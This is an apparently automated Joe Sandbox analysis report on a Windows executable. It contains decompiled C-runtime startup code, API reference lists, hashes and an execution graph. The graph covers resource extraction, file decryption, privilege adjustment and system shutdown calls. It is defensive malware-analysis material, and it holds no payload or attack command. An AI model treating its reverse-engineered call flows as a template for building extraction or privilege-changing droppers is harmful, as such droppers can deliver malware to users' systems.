                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Prev$Next
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3260447230-0
                                                                                                                                                                                                        • Opcode ID: 259791afbe62fcad4c9b08c7f7fa43d2e11d73258d3a3d34d601f2859685d3e4
                                                                                                                                                                                                        • Instruction ID: 513ee1d8b36cf1e354daf22369da6584cdfe0a062a310d5c4f80e2dc31ca49ff
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 259791afbe62fcad4c9b08c7f7fa43d2e11d73258d3a3d34d601f2859685d3e4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACF028323041906EEF365B698C88DBBBFDCCF9B364B3A02AFE59582001DA150D0786A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A969B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A969B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0xa981f8 = E00A96C70();
				__set_app_type(E00A96FBE(2));
				 *0xa988a4 =  *0xa988a4 | 0xffffffff;
				 *0xa988a8 =  *0xa988a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0xa98528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0xa9851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00A97000();
				if( *0xa98000 == 0) {
					__setusermatherr(E00A97000);
				}
				E00A971EF(_t6);
				return 0;
			}








                                                                                                                                                                                                        0x00a969b7
                                                                                                                                                                                                        0x00a969c2
                                                                                                                                                                                                        0x00a969c8
                                                                                                                                                                                                        0x00a969cf
                                                                                                                                                                                                        0x00a969d8
                                                                                                                                                                                                        0x00a969de
                                                                                                                                                                                                        0x00a969e4
                                                                                                                                                                                                        0x00a969e6
                                                                                                                                                                                                        0x00a969ec
                                                                                                                                                                                                        0x00a969f2
                                                                                                                                                                                                        0x00a969f4
                                                                                                                                                                                                        0x00a96a00
                                                                                                                                                                                                        0x00a96a07
                                                                                                                                                                                                        0x00a96a0d
                                                                                                                                                                                                        0x00a96a0e
                                                                                                                                                                                                        0x00a96a15

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A96FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A96FC5
                                                                                                                                                                                                        • __set_app_type.MSVCRT ref: 00A969C2
                                                                                                                                                                                                        • __p__fmode.MSVCRT ref: 00A969D8
                                                                                                                                                                                                        • __p__commode.MSVCRT ref: 00A969E6
                                                                                                                                                                                                        • __setusermatherr.MSVCRT ref: 00A96A07
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1632413811-0
                                                                                                                                                                                                        • Opcode ID: 9e1bbcd8aa3e5cf114a7cc95fec459383898e7e66efa54e41f3b1e8fbb65e1a9
                                                                                                                                                                                                        • Instruction ID: dd3c3ba7d22f4b52861300945e2225c069524c56f88487221ced9ddc92d363cd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e1bbcd8aa3e5cf114a7cc95fec459383898e7e66efa54e41f3b1e8fbb65e1a9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1BF0F8703083018FCB54EBB4AE4A6583BA1FB16321B50460BE462862F0CF3E8556CA21
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:28.7%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:962
                                                                                                                                                                                                        Total number of Limit Nodes:25
                                                                                                                                                                                                        execution_graph 2196 214ca0 GlobalAlloc 2197 216a60 2214 217155 2197->2214 2199 216a65 2200 216a76 GetStartupInfoW 2199->2200 2201 216a93 2200->2201 2202 216aa8 2201->2202 2203 216aaf Sleep 2201->2203 2204 216ac7 _amsg_exit 2202->2204 2207 216ad1 2202->2207 2203->2201 2204->2207 2205 216b13 _initterm 2206 216b2e __IsNonwritableInCurrentImage 2205->2206 2208 216bd6 _ismbblead 2206->2208 2209 216c1e 2206->2209 2213 216bbe exit 2206->2213 2219 212bfb GetVersion 2206->2219 2207->2205 2207->2206 2210 216af4 2207->2210 2208->2206 2209->2210 2211 216c27 _cexit 2209->2211 2211->2210 2213->2206 2215 21717a 2214->2215 2216 21717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2216 2215->2216 2217 2171e2 2215->2217 2218 2171cd 2216->2218 2217->2199 2218->2217 2220 212c50 2219->2220 2221 212c0f 2219->2221 2236 212caa memset memset memset 2220->2236 2221->2220 2222 212c13 GetModuleHandleW 2221->2222 2222->2220 2224 212c22 GetProcAddress 2222->2224 2224->2220 2226 212c34 2224->2226 2226->2220 2227 212c8e 2228 212c97 CloseHandle 2227->2228 2229 212c9e 2227->2229 2228->2229 2229->2206 2234 212c89 2330 211f90 2234->2330 2347 21468f FindResourceA SizeofResource 2236->2347 2239 212d2d CreateEventA SetEvent 2241 21468f 7 API calls 2239->2241 2240 212ef3 2242 2144b9 20 API calls 2240->2242 2243 212d57 2241->2243 2244 212d6e 2242->2244 2245 212d5b 2243->2245 2247 212e1f 2243->2247 2250 21468f 7 API calls 2243->2250 2352 216ce0 2244->2352 2357 2144b9 2245->2357 2386 215c9e 2247->2386 2253 212d9f 2250->2253 2251 212c62 2251->2227 2277 212f1d 2251->2277 2253->2245 2256 212da3 CreateMutexA 2253->2256 2254 212e30 2254->2240 2255 212e3a 2258 212e43 2255->2258 2259 212e52 FindResourceA 2255->2259 2256->2247 2257 212dbd GetLastError 2256->2257 2257->2247 2260 212dca 2257->2260 2412 212390 2258->2412 2261 212e64 LoadResource 2259->2261 2262 212e6e 2259->2262 2265 212dd5 2260->2265 2266 212dea 2260->2266 2261->2262 2264 212e4d 2262->2264 2427 2136ee GetVersionExA 2262->2427 2264->2244 2267 2144b9 20 API calls 2265->2267 2268 2144b9 20 API calls 2266->2268 2269 212de8 2267->2269 2270 212dff 2268->2270 2272 212e04 CloseHandle 2269->2272 2270->2247 2270->2272 2272->2244 2278 212f6c 2277->2278 2279 212f3f 2277->2279 2571 215164 2278->2571 2280 212f5f 2279->2280 2552 2151e5 2279->2552 2699 213a3f 2280->2699 2286 21303c 2289 216ce0 4 API calls 2286->2289 2287 212f71 2287->2286 2584 2155a0 2287->2584 2291 212c6b 2289->2291 2317 2152b6 2291->2317 2292 212f86 GetSystemDirectoryA 2293 21658a CharPrevA 2292->2293 2294 212fab LoadLibraryA 2293->2294 2295 212fc0 GetProcAddress 2294->2295 2296 212ff7 FreeLibrary 2294->2296 2295->2296 2297 212fd6 DecryptFileA 2295->2297 2298 213017 SetCurrentDirectoryA 2296->2298 2299 213006 2296->2299 2297->2296 2306 212ff0 2297->2306 2300 213054 2298->2300 2301 213026 2298->2301 2299->2298 2632 21621e GetWindowsDirectoryA 2299->2632 2303 213061 2300->2303 2642 213b26 2300->2642 2305 2144b9 20 API calls 2301->2305 2303->2286 2308 21307a 2303->2308 2651 21256d 2303->2651 2310 213037 2305->2310 2306->2296 2312 213098 2308->2312 2662 213ba2 2308->2662 2718 216285 GetLastError 2310->2718 2312->2286 2314 2130af 2312->2314 2720 214169 2314->2720 2318 2152d6 2317->2318 2325 215316 2317->2325 2320 215300 LocalFree LocalFree 2318->2320 2321 2152eb SetFileAttributesA DeleteFileA 2318->2321 2319 21538c 2322 216ce0 4 API calls 2319->2322 2320->2318 2320->2325 2321->2320 2324 212c72 2322->2324 2324->2227 2324->2234 2326 21535e SetCurrentDirectoryA 2325->2326 2327 2165e8 4 API calls 2325->2327 2329 215374 2325->2329 2328 212390 13 API calls 2326->2328 2327->2326 2328->2329 2329->2319 3050 211fe1 2329->3050 2331 211f9f 2330->2331 2332 211f9a 2330->2332 2334 211fc0 2331->2334 2335 2144b9 20 API calls 2331->2335 2338 211fd9 2331->2338 2333 211ea7 15 API calls 2332->2333 2333->2331 2336 211ee2 GetCurrentProcess OpenProcessToken 2334->2336 2337 211fcf ExitWindowsEx 2334->2337 2334->2338 2335->2334 2340 211f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2336->2340 2341 211f0e 2336->2341 2337->2338 2338->2227 2340->2341 2342 211f6b ExitWindowsEx 2340->2342 2344 2144b9 20 API calls 2341->2344 2342->2341 2343 211f1f 2342->2343 2345 216ce0 4 API calls 2343->2345 2344->2343 2346 211f8c 2345->2346 2346->2227 2348 2146b6 2347->2348 2349 212d1a 2347->2349 2348->2349 2350 2146be FindResourceA LoadResource LockResource 2348->2350 2349->2239 2349->2240 2350->2349 2351 2146df memcpy_s FreeResource 2350->2351 2351->2349 2353 216ce8 2352->2353 2354 216ceb 2352->2354 2353->2251 2469 216cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2354->2469 2356 216e26 2356->2251 2358 21455a 2357->2358 2359 2144fe LoadStringA 2357->2359 2363 216ce0 4 API calls 2358->2363 2360 214562 2359->2360 2361 214527 2359->2361 2366 2145c9 2360->2366 2372 21457e 2360->2372 2362 21681f 10 API calls 2361->2362 2365 21452c 2362->2365 2364 214689 2363->2364 2364->2244 2367 214536 MessageBoxA 2365->2367 2482 2167c9 2365->2482 2369 214607 LocalAlloc 2366->2369 2370 2145cd LocalAlloc 2366->2370 2367->2358 2369->2358 2380 2145c4 2369->2380 2370->2358 2376 2145f3 2370->2376 2372->2372 2375 214596 LocalAlloc 2372->2375 2374 21462d MessageBeep 2470 21681f 2374->2470 2375->2358 2379 2145af 2375->2379 2377 21171e _vsnprintf 2376->2377 2377->2380 2488 21171e 2379->2488 2380->2374 2383 214645 MessageBoxA LocalFree 2383->2358 2384 2167c9 EnumResourceLanguagesA 2384->2383 2393 215e17 2386->2393 2396 215cc3 2386->2396 2387 215dd0 2391 215dec GetModuleFileNameA 2387->2391 2387->2393 2388 216ce0 4 API calls 2390 212e2c 2388->2390 2389 215ced CharNextA 2389->2396 2390->2254 2390->2255 2392 215e0a 2391->2392 2391->2393 2498 2166c8 2392->2498 2393->2388 2395 216218 2507 216e2a 2395->2507 2396->2387 2396->2389 2396->2393 2396->2395 2399 215e36 CharUpperA 2396->2399 2405 215f9f CharUpperA 2396->2405 2406 215f59 CompareStringA 2396->2406 2407 216003 CharUpperA 2396->2407 2408 215edc CharUpperA 2396->2408 2409 2160a2 CharUpperA 2396->2409 2411 21667f IsDBCSLeadByte CharNextA 2396->2411 2503 21658a 2396->2503 2399->2396 2400 2161d0 2399->2400 2401 2144b9 20 API calls 2400->2401 2402 2161e7 2401->2402 2403 2161f0 CloseHandle 2402->2403 2404 2161f7 ExitProcess 2402->2404 2403->2404 2405->2396 2406->2396 2407->2396 2408->2396 2409->2396 2411->2396 2413 2123b9 2412->2413 2414 2124cb 2412->2414 2413->2414 2417 2123e9 FindFirstFileA 2413->2417 2415 216ce0 4 API calls 2414->2415 2416 2124dc 2415->2416 2416->2264 2417->2414 2425 212407 2417->2425 2418 212421 lstrcmpA 2420 212431 lstrcmpA 2418->2420 2421 2124a9 FindNextFileA 2418->2421 2419 212479 2422 212488 SetFileAttributesA DeleteFileA 2419->2422 2420->2421 2420->2425 2423 2124bd FindClose RemoveDirectoryA 2421->2423 2421->2425 2422->2421 2423->2414 2424 21658a CharPrevA 2424->2425 2425->2418 2425->2419 2425->2421 2425->2424 2426 212390 5 API calls 2425->2426 2426->2425 2431 213737 2427->2431 2433 21372d 2427->2433 2428 2144b9 20 API calls 2441 2139fc 2428->2441 2429 216ce0 4 API calls 2430 212e92 2429->2430 2430->2244 2430->2264 2442 2118a3 2430->2442 2431->2433 2434 2138a4 2431->2434 2431->2441 2514 2128e8 2431->2514 2433->2428 2433->2441 2434->2433 2435 2139c1 MessageBeep 2434->2435 2434->2441 2436 21681f 10 API calls 2435->2436 2437 2139ce 2436->2437 2438 2139d8 MessageBoxA 2437->2438 2440 2167c9 EnumResourceLanguagesA 2437->2440 2438->2441 2440->2438 2441->2429 2443 2118d5 2442->2443 2449 2119b8 2442->2449 2543 2117ee LoadLibraryA 2443->2543 2445 216ce0 4 API calls 2447 2119d5 2445->2447 2447->2264 2462 216517 FindResourceA 2447->2462 2448 2118e5 GetCurrentProcess OpenProcessToken 2448->2449 2450 211900 GetTokenInformation 2448->2450 2449->2445 2451 211918 GetLastError 2450->2451 2452 2119aa CloseHandle 2450->2452 2451->2452 2453 211927 LocalAlloc 2451->2453 2452->2449 2454 2119a9 2453->2454 2455 211938 GetTokenInformation 2453->2455 2454->2452 2456 2119a2 LocalFree 2455->2456 2457 21194e AllocateAndInitializeSid 2455->2457 2456->2454 2457->2456 2458 21196e 2457->2458 2459 211999 FreeSid 2458->2459 2460 211975 EqualSid 2458->2460 2461 21198c 2458->2461 2459->2456 2460->2458 2460->2461 2461->2459 2463 216536 LoadResource 2462->2463 2464 21656b 2462->2464 2463->2464 2466 216544 DialogBoxIndirectParamA FreeResource 2463->2466 2465 2144b9 20 API calls 2464->2465 2467 21657c 2465->2467 2466->2464 2466->2467 2467->2264 2469->2356 2471 216940 2470->2471 2472 216857 GetVersionExA 2470->2472 2473 216ce0 4 API calls 2471->2473 2474 21687c 2472->2474 2481 21691a 2472->2481 2475 21463b 2473->2475 2476 2168a5 GetSystemMetrics 2474->2476 2474->2481 2475->2383 2475->2384 2477 2168b5 RegOpenKeyExA 2476->2477 2476->2481 2478 2168d6 RegQueryValueExA RegCloseKey 2477->2478 2477->2481 2479 21690c 2478->2479 2478->2481 2492 2166f9 2479->2492 2481->2471 2483 2167e2 2482->2483 2484 216803 2482->2484 2496 216793 EnumResourceLanguagesA 2483->2496 2484->2367 2486 2167f5 2486->2484 2497 216793 EnumResourceLanguagesA 2486->2497 2489 21172d 2488->2489 2490 21173d _vsnprintf 2489->2490 2491 21175d 2489->2491 2490->2491 2491->2380 2493 21670f 2492->2493 2494 216740 CharNextA 2493->2494 2495 21674b 2493->2495 2494->2493 2495->2481 2496->2486 2497->2484 2500 2166d5 2498->2500 2499 2166f3 2499->2393 2500->2499 2502 2166e5 CharNextA 2500->2502 2510 216648 2500->2510 2502->2500 2504 21659b 2503->2504 2504->2504 2505 2165b8 CharPrevA 2504->2505 2506 2165ab 2504->2506 2505->2506 2506->2396 2513 216cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 21621d 2511 216668 2510->2511 2512 21665d IsDBCSLeadByte 2510->2512 2511->2500 2512->2511 2513->2509 2515 212a62 2514->2515 2522 21290d 2514->2522 2516 212a75 2515->2516 2517 212a6e GlobalFree 2515->2517 2516->2434 2517->2516 2519 212955 GlobalAlloc 2519->2515 2520 212968 GlobalLock 2519->2520 2520->2515 2520->2522 2521 212a20 GlobalUnlock 2521->2522 2522->2515 2522->2519 2522->2521 2523 212a80 GlobalUnlock 2522->2523 2524 212773 2522->2524 2523->2515 2525 2127a3 CharUpperA CharNextA CharNextA 2524->2525 2526 2128b2 2524->2526 2527 2128b7 GetSystemDirectoryA 2525->2527 2528 2127db 2525->2528 2526->2527 2529 2128bf 2527->2529 2530 2127e3 2528->2530 2531 2128a8 GetWindowsDirectoryA 2528->2531 2532 2128d2 2529->2532 2533 21658a CharPrevA 2529->2533 2535 21658a CharPrevA 2530->2535 2531->2529 2534 216ce0 4 API calls 2532->2534 2533->2532 2536 2128e2 2534->2536 2537 212810 RegOpenKeyExA 2535->2537 2536->2522 2537->2529 2538 212837 RegQueryValueExA 2537->2538 2539 21289a RegCloseKey 2538->2539 2540 21285c 2538->2540 2539->2529 2541 212867 ExpandEnvironmentStringsA 2540->2541 2542 21287a 2540->2542 2541->2542 2542->2539 2544 211890 2543->2544 2545 211826 GetProcAddress 2543->2545 2548 216ce0 4 API calls 2544->2548 2546 211889 FreeLibrary 2545->2546 2547 211839 AllocateAndInitializeSid 2545->2547 2546->2544 2547->2546 2551 21185f FreeSid 2547->2551 2549 21189f 2548->2549 2549->2448 2549->2449 2551->2546 2553 21468f 7 API calls 2552->2553 2554 2151f9 LocalAlloc 2553->2554 2555 21522d 2554->2555 2556 21520d 2554->2556 2558 21468f 7 API calls 2555->2558 2557 2144b9 20 API calls 2556->2557 2559 21521e 2557->2559 2560 21523a 2558->2560 2561 216285 GetLastError 2559->2561 2562 215262 lstrcmpA 2560->2562 2563 21523e 2560->2563 2568 212f4d 2561->2568 2565 215272 LocalFree 2562->2565 2566 21527e 2562->2566 2564 2144b9 20 API calls 2563->2564 2567 21524f LocalFree 2564->2567 2565->2568 2569 2144b9 20 API calls 2566->2569 2567->2568 2568->2278 2568->2280 2568->2286 2570 215290 LocalFree 2569->2570 2570->2568 2572 21468f 7 API calls 2571->2572 2573 215175 2572->2573 2574 21517a 2573->2574 2575 2151af 2573->2575 2577 2144b9 20 API calls 2574->2577 2576 21468f 7 API calls 2575->2576 2578 2151c0 2576->2578 2579 21518d 2577->2579 2733 216298 2578->2733 2579->2287 2582 2151e1 2582->2287 2583 2144b9 20 API calls 2583->2579 2585 21468f 7 API calls 2584->2585 2586 2155c7 LocalAlloc 2585->2586 2587 2155db 2586->2587 2588 2155fd 2586->2588 2589 2144b9 20 API calls 2587->2589 2590 21468f 7 API calls 2588->2590 2592 2155ec 2589->2592 2591 21560a 2590->2591 2593 215632 lstrcmpA 2591->2593 2594 21560e 2591->2594 2595 216285 GetLastError 2592->2595 2597 215645 2593->2597 2598 21564b LocalFree 2593->2598 2596 2144b9 20 API calls 2594->2596 2620 2155f1 2595->2620 2599 21561f LocalFree 2596->2599 2597->2598 2600 215696 2598->2600 2601 21565b 2598->2601 2599->2620 2602 21589f 2600->2602 2604 2156ae GetTempPathA 2600->2604 2609 215467 49 API calls 2601->2609 2605 216517 24 API calls 2602->2605 2603 216ce0 4 API calls 2606 212f7e 2603->2606 2607 2156eb 2604->2607 2608 2156c3 2604->2608 2605->2620 2606->2286 2606->2292 2614 215717 GetDriveTypeA 2607->2614 2615 21586c GetWindowsDirectoryA 2607->2615 2607->2620 2745 215467 2608->2745 2611 215678 2609->2611 2613 2144b9 20 API calls 2611->2613 2611->2620 2613->2620 2616 215730 GetFileAttributesA 2614->2616 2630 21572b 2614->2630 2779 21597d GetCurrentDirectoryA SetCurrentDirectoryA 2615->2779 2616->2630 2620->2603 2621 21597d 34 API calls 2621->2630 2622 215467 49 API calls 2622->2607 2623 212630 21 API calls 2623->2630 2625 2157c1 GetWindowsDirectoryA 2625->2630 2626 21658a CharPrevA 2627 2157e8 GetFileAttributesA 2626->2627 2628 2157fa CreateDirectoryA 2627->2628 2627->2630 2628->2630 2629 215827 SetFileAttributesA 2629->2630 2630->2614 2630->2615 2630->2616 2630->2620 2630->2621 2630->2623 2630->2625 2630->2626 2630->2629 2631 215467 49 API calls 2630->2631 2775 216952 2630->2775 2631->2630 2633 216249 2632->2633 2634 216268 2632->2634 2635 2144b9 20 API calls 2633->2635 2636 21597d 34 API calls 2634->2636 2637 21625a 2635->2637 2638 21625f 2636->2638 2640 216285 GetLastError 2637->2640 2639 216ce0 4 API calls 2638->2639 2641 213013 2639->2641 2640->2638 2641->2286 2641->2298 2643 213b2d 2642->2643 2643->2643 2644 213b72 2643->2644 2645 213b53 2643->2645 2845 214fe0 2644->2845 2647 216517 24 API calls 2645->2647 2648 213b70 2647->2648 2649 216298 10 API calls 2648->2649 2650 213b7b 2648->2650 2649->2650 2650->2303 2652 212583 2651->2652 2653 212622 2651->2653 2654 2125e8 RegOpenKeyExA 2652->2654 2655 21258b 2652->2655 2896 2124e0 GetWindowsDirectoryA 2653->2896 2657 2125e3 2654->2657 2658 212609 RegQueryInfoKeyA 2654->2658 2655->2657 2659 21259b RegOpenKeyExA 2655->2659 2657->2308 2660 2125d1 RegCloseKey 2658->2660 2659->2657 2661 2125bc RegQueryValueExA 2659->2661 2660->2657 2661->2660 2663 213bdb 2662->2663 2678 213bec 2662->2678 2665 21468f 7 API calls 2663->2665 2664 213c03 memset 2664->2678 2665->2678 2666 213d13 2668 2144b9 20 API calls 2666->2668 2667 21468f 7 API calls 2667->2678 2674 213d26 2668->2674 2670 216ce0 4 API calls 2671 213f60 2670->2671 2671->2312 2672 213d7b CompareStringA 2673 213fd7 2672->2673 2672->2678 2673->2674 2995 212267 2673->2995 2674->2670 2675 213fab 2679 2144b9 20 API calls 2675->2679 2678->2664 2678->2666 2678->2667 2678->2672 2678->2673 2678->2674 2678->2675 2682 213f46 LocalFree 2678->2682 2683 213f1e LocalFree 2678->2683 2685 213cc7 CompareStringA 2678->2685 2696 213e10 2678->2696 2904 211ae8 2678->2904 2945 21202a memset memset RegCreateKeyExA 2678->2945 2971 213fef 2678->2971 2681 213fbe LocalFree 2679->2681 2681->2674 2682->2674 2683->2673 2683->2678 2685->2678 2686 213f92 2689 2144b9 20 API calls 2686->2689 2687 213e1f GetProcAddress 2688 213f64 2687->2688 2687->2696 2690 2144b9 20 API calls 2688->2690 2691 213fa9 2689->2691 2692 213f75 FreeLibrary 2690->2692 2693 213f7c LocalFree 2691->2693 2692->2693 2694 216285 GetLastError 2693->2694 2695 213f8b 2694->2695 2695->2674 2696->2686 2696->2687 2697 213f40 FreeLibrary 2696->2697 2698 213eff FreeLibrary 2696->2698 2985 216495 2696->2985 2697->2682 2698->2683 2700 21468f 7 API calls 2699->2700 2701 213a55 LocalAlloc 2700->2701 2702 213a6c 2701->2702 2703 213a8e 2701->2703 2704 2144b9 20 API calls 2702->2704 2705 21468f 7 API calls 2703->2705 2706 213a7d 2704->2706 2707 213a98 2705->2707 2708 216285 GetLastError 2706->2708 2709 213ac5 lstrcmpA 2707->2709 2710 213a9c 2707->2710 2717 212f64 2708->2717 2711 213ada 2709->2711 2712 213b0d LocalFree 2709->2712 2713 2144b9 20 API calls 2710->2713 2714 216517 24 API calls 2711->2714 2712->2717 2715 213aad LocalFree 2713->2715 2716 213aec LocalFree 2714->2716 2715->2717 2716->2717 2717->2278 2717->2286 2719 21628f 2718->2719 2719->2286 2721 21468f 7 API calls 2720->2721 2722 21417d LocalAlloc 2721->2722 2723 214195 2722->2723 2724 2141a8 2722->2724 2725 2144b9 20 API calls 2723->2725 2726 21468f 7 API calls 2724->2726 2727 2141a6 2725->2727 2728 2141b5 2726->2728 2727->2286 2729 2141c5 lstrcmpA 2728->2729 2730 2141b9 2728->2730 2729->2730 2731 2141e6 LocalFree 2729->2731 2732 2144b9 20 API calls 2730->2732 2731->2727 2732->2731 2734 21171e _vsnprintf 2733->2734 2735 2162c9 FindResourceA 2734->2735 2737 216353 2735->2737 2738 2162cb LoadResource LockResource 2735->2738 2739 216ce0 4 API calls 2737->2739 2738->2737 2741 2162e0 2738->2741 2740 2151ca 2739->2740 2740->2582 2740->2583 2742 216355 FreeResource 2741->2742 2743 21631b FreeResource 2741->2743 2742->2737 2744 21171e _vsnprintf 2743->2744 2744->2735 2746 21548a 2745->2746 2747 21551a 2745->2747 2805 2153a1 2746->2805 2816 2158c8 2747->2816 2750 215495 2755 2154c2 GetSystemInfo 2750->2755 2756 21550c 2750->2756 2760 215581 2750->2760 2752 216ce0 4 API calls 2757 21559a 2752->2757 2753 21553b CreateDirectoryA 2758 215577 2753->2758 2759 215547 2753->2759 2754 21554d 2754->2760 2761 21597d 34 API calls 2754->2761 2767 2154da 2755->2767 2762 21658a CharPrevA 2756->2762 2757->2620 2769 212630 GetWindowsDirectoryA 2757->2769 2763 216285 GetLastError 2758->2763 2759->2754 2760->2752 2764 21555c 2761->2764 2762->2747 2765 21557c 2763->2765 2764->2760 2768 215568 RemoveDirectoryA 2764->2768 2765->2760 2766 21658a CharPrevA 2766->2756 2767->2756 2767->2766 2768->2760 2770 21266f 2769->2770 2771 21265e 2769->2771 2773 216ce0 4 API calls 2770->2773 2772 2144b9 20 API calls 2771->2772 2772->2770 2774 212687 2773->2774 2774->2607 2774->2622 2776 2169a1 2775->2776 2777 21696e GetDiskFreeSpaceA 2775->2777 2776->2630 2777->2776 2778 216989 MulDiv 2777->2778 2778->2776 2780 2159bb 2779->2780 2781 2159dd GetDiskFreeSpaceA 2779->2781 2782 2144b9 20 API calls 2780->2782 2783 215ba1 memset 2781->2783 2784 215a21 MulDiv 2781->2784 2785 2159cc 2782->2785 2786 216285 GetLastError 2783->2786 2784->2783 2787 215a50 GetVolumeInformationA 2784->2787 2788 216285 GetLastError 2785->2788 2789 215bbc GetLastError FormatMessageA 2786->2789 2790 215ab5 SetCurrentDirectoryA 2787->2790 2791 215a6e memset 2787->2791 2800 2159d1 2788->2800 2792 215be3 2789->2792 2799 215acc 2790->2799 2793 216285 GetLastError 2791->2793 2794 2144b9 20 API calls 2792->2794 2795 215a89 GetLastError FormatMessageA 2793->2795 2797 215bf5 SetCurrentDirectoryA 2794->2797 2795->2792 2796 216ce0 4 API calls 2798 215c11 2796->2798 2797->2800 2798->2607 2801 215b0a 2799->2801 2803 215b20 2799->2803 2800->2796 2802 2144b9 20 API calls 2801->2802 2802->2800 2803->2800 2828 21268b 2803->2828 2809 2153bf 2805->2809 2806 21171e _vsnprintf 2806->2809 2807 21658a CharPrevA 2808 2153fa RemoveDirectoryA GetFileAttributesA 2807->2808 2808->2809 2810 21544f CreateDirectoryA 2808->2810 2809->2806 2809->2807 2811 215415 GetTempFileNameA 2809->2811 2810->2811 2812 21543a 2810->2812 2811->2812 2813 215429 DeleteFileA CreateDirectoryA 2811->2813 2814 216ce0 4 API calls 2812->2814 2813->2812 2815 215449 2814->2815 2815->2750 2817 2158d8 2816->2817 2817->2817 2818 2158df LocalAlloc 2817->2818 2819 2158f3 2818->2819 2822 215919 2818->2822 2820 2144b9 20 API calls 2819->2820 2821 215906 2820->2821 2823 216285 GetLastError 2821->2823 2825 215534 2821->2825 2824 21658a CharPrevA 2822->2824 2823->2825 2826 215931 CreateFileA LocalFree 2824->2826 2825->2753 2825->2754 2826->2821 2827 21595b CloseHandle GetFileAttributesA 2826->2827 2827->2821 2829 2126e5 2828->2829 2830 2126b9 2828->2830 2832 2126ea 2829->2832 2833 21271f 2829->2833 2831 21171e _vsnprintf 2830->2831 2834 2126cc 2831->2834 2835 21171e _vsnprintf 2832->2835 2837 21171e _vsnprintf 2833->2837 2843 2126e3 2833->2843 2839 2144b9 20 API calls 2834->2839 2836 2126fd 2835->2836 2840 2144b9 20 API calls 2836->2840 2841 212735 2837->2841 2838 216ce0 4 API calls 2842 21276d 2838->2842 2839->2843 2840->2843 2844 2144b9 20 API calls 2841->2844 2842->2800 2843->2838 2844->2843 2846 21468f 7 API calls 2845->2846 2847 214ff5 FindResourceA LoadResource LockResource 2846->2847 2848 215020 2847->2848 2861 21515f 2847->2861 2849 215057 2848->2849 2850 215029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2848->2850 2864 214efd 2849->2864 2850->2849 2853 215060 2854 2144b9 20 API calls 2853->2854 2858 215075 2854->2858 2855 2144b9 20 API calls 2855->2858 2856 215110 FreeResource 2857 21511d 2856->2857 2859 21513a 2857->2859 2862 2144b9 20 API calls 2857->2862 2858->2856 2858->2857 2859->2861 2863 21514c SendMessageA 2859->2863 2860 21507c 2860->2855 2860->2858 2861->2648 2862->2859 2863->2861 2865 214f4a 2864->2865 2866 214fa1 2865->2866 2872 214980 2865->2872 2868 216ce0 4 API calls 2866->2868 2869 214fc6 2868->2869 2869->2853 2869->2860 2873 214990 2872->2873 2874 2149c2 lstrcmpA 2873->2874 2875 2149a5 2873->2875 2877 2149ba 2874->2877 2878 214a0e 2874->2878 2876 2144b9 20 API calls 2875->2876 2876->2877 2877->2866 2880 214b60 2877->2880 2878->2877 2883 21487a 2878->2883 2881 214b92 FindCloseChangeNotification 2880->2881 2882 214b76 2880->2882 2881->2882 2882->2866 2884 2148a2 CreateFileA 2883->2884 2886 2148e9 2884->2886 2887 214908 2884->2887 2886->2887 2888 2148ee 2886->2888 2887->2877 2891 21490c 2888->2891 2892 2148f5 CreateFileA 2891->2892 2894 214917 2891->2894 2892->2887 2893 214962 CharNextA 2893->2894 2894->2892 2894->2893 2895 214953 